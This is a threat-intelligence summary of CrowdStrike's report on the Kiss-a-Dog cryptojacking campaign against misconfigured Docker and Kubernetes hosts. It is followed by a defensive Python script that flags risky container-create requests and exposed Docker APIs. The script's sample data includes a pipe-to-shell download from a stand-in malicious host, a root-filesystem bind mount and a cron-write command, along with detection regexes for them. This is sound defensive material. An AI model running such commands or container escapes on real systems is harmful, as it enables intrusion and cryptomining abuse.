Vulnerable Containers Targeted in New, Kiss-a-Dog Cryptojacking Campaign
Category: Threat Actor Activity | Industry: N/A | Level: Tactical | Source: CrowdStrike
A new cryptojacking campaign, named 'Kiss-a-Dog' after the operator's domains, has been discovered by CrowdStrike researchers targeting Docker and Kubernetes infrastructure. "Called 'Kiss-a-dog,' the campaign used multiple command-and-control (C2) servers to launch attacks that attempted to mine cryptocurrency, utilize user and kernel mode rootkits to hide the activity, backdoor compromised containers, move laterally in the network and gain persistence."

The campaign was detected in CrowdStrike's honeypots in September 2022, as threat actors exploited misconfigured Docker instances to download and execute a script from the attacker's domain, kiss[.]a-dog[.]top. For persistence, a malicious payload is added as a cron job on the compromised system. To escape the container, the attacker uses a 'host mount' to mount the host's volume into the container. "The technique itself is not new and seems to be common among cryptominers as an attempt to break out of containers. This is attributed to a lack of innovation by attackers and at the same time speaks to the vast and easy Docker attack surface exposed and available on the internet." A scan of exposed instances on Shodan by CrowdStrike discovered 13,327 exposed Docker instances and 68,151 exposed Kubernetes instances.

Security agents present on the containers were uninstalled to evade detection. This made it easier for the attackers to launch their rootkits, Diamorphine and libprocesshide, which are capable of hiding processes from the user. Additional stealth tactics were used in their files, as "the Kiss-a-dog campaign chose to encode the C/C++ code files and embed as a Base64 string into the script." The attacker's objective was completed with the execution of a cryptocurrency miner such as XMRig. The tactics, techniques, and procedures (TTPs) used in this attack, along with other Docker campaigns tracked by CrowdStrike, are similar to those used by the threat group TeamTNT.
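The two conditions the summary above describes (a Docker API reachable by the attacker, then a container created with a host-path bind mount and a download-and-execute command) can both be checked from data a defender already has: the daemon configuration and the `POST /containers/create` request bodies logged at the API. The following Python is an added example, not CrowdStrike's or Anvilogic's detection logic; the request bodies and `daemon.json` fragment are constructed for the demonstration, and only the field names (`Image`, `Cmd`, `HostConfig.Binds`, `HostConfig.Privileged`, `HostConfig.PidMode`, `hosts`, `tlsverify`) are the real Docker Engine ones. The watchlist of sensitive host paths is an assumption for this example.

```python
"""Heuristic review of Docker container-create requests and daemon config for
the abuse pattern described above. Added example with constructed inputs; not
vendor detection content."""
import json
import re
from typing import Dict, List

# Host paths whose exposure inside a container gives control of the host
# (root filesystem, cron spool, Docker socket). Assumed watchlist for this example.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/var/spool/cron", "/etc/cron.d",
                        "/var/run/docker.sock", "/run/docker.sock")

# Shell fragments typical of "fetch a script and pipe it to a shell", or of
# decoding an embedded Base64 blob as the summary describes.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b|\bbase64\s+(-d|--decode)\b")


def _bind_source(bind: str) -> str:
    """Bind syntax is 'host_path:container_path[:options]'; return the host side."""
    return bind.split(":", 1)[0]


def assess_container_create(body: Dict) -> List[str]:
    """Return finding strings for one `POST /containers/create` request body."""
    findings = []
    host_cfg = body.get("HostConfig", {}) or {}

    for bind in host_cfg.get("Binds", []) or []:
        src = _bind_source(bind)
        if src == "/":
            findings.append(f"host root filesystem bind-mounted ({bind}): container escape")
        elif any(src == p or src.startswith(p.rstrip("/") + "/")
                 for p in SENSITIVE_HOST_PATHS if p != "/"):
            findings.append(f"sensitive host path bind-mounted ({bind})")

    if host_cfg.get("Privileged"):
        findings.append("privileged container requested")
    if host_cfg.get("PidMode") == "host":
        findings.append("host PID namespace shared")

    cmd = body.get("Cmd") or []
    cmd_text = " ".join(cmd) if isinstance(cmd, list) else str(cmd)
    if DOWNLOAD_EXEC.search(cmd_text):
        findings.append(f"download-and-execute command: {cmd_text!r}")
    return findings


def exposed_api_listeners(daemon_json: str) -> List[str]:
    """Return tcp:// listeners from a daemon.json 'hosts' list when TLS client
    verification is not enabled, i.e. the API is reachable unauthenticated."""
    cfg = json.loads(daemon_json)
    if cfg.get("tlsverify"):
        return []
    return [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]


# Constructed sample request bodies (not captured traffic).
SAMPLE_REQUESTS = [
    {"Image": "alpine:latest",
     "Cmd": ["sh", "-c", "curl -s http://malicious.example/t.sh | sh"],
     "HostConfig": {"Binds": ["/:/mnt"], "Privileged": True}},
    {"Image": "nginx:stable",
     "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]}},
    {"Image": "alpine:latest",
     "Cmd": ["sh", "-c", "echo '* * * * * root /bin/true' > /cron/job"],
     "HostConfig": {"Binds": ["/etc/cron.d:/cron"]}},
]

# Constructed daemon.json fragment: API bound on all interfaces without TLS.
SAMPLE_DAEMON_JSON = '{"hosts": ["tcp://0.0.0.0:2375", "unix:///var/run/docker.sock"]}'

if __name__ == "__main__":
    for listener in exposed_api_listeners(SAMPLE_DAEMON_JSON):
        print(f"[daemon] unauthenticated API listener: {listener}")
    for i, req in enumerate(SAMPLE_REQUESTS):
        for finding in assess_container_create(req):
            print(f"[request {i}] {finding}")
```

The first request trips all three heuristics at once (root bind mount, privileged flag, pipe-to-shell), which is the profile of the container-escape-then-payload sequence in the summary; the third shows a cron spool mounted on its own, the persistence step, which a rule keyed only on `/` would miss. Running the daemon check against an exposed listener is the cheapest of the four Anvilogic use cases below to implement, since the setting is static and can be audited on every host.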
Anvilogic Use Cases:
- Docker API Abuse & Container Created
- Rare shell script execution
- Publicly exposed Docker API
- Kubernetes Potential Cryptomining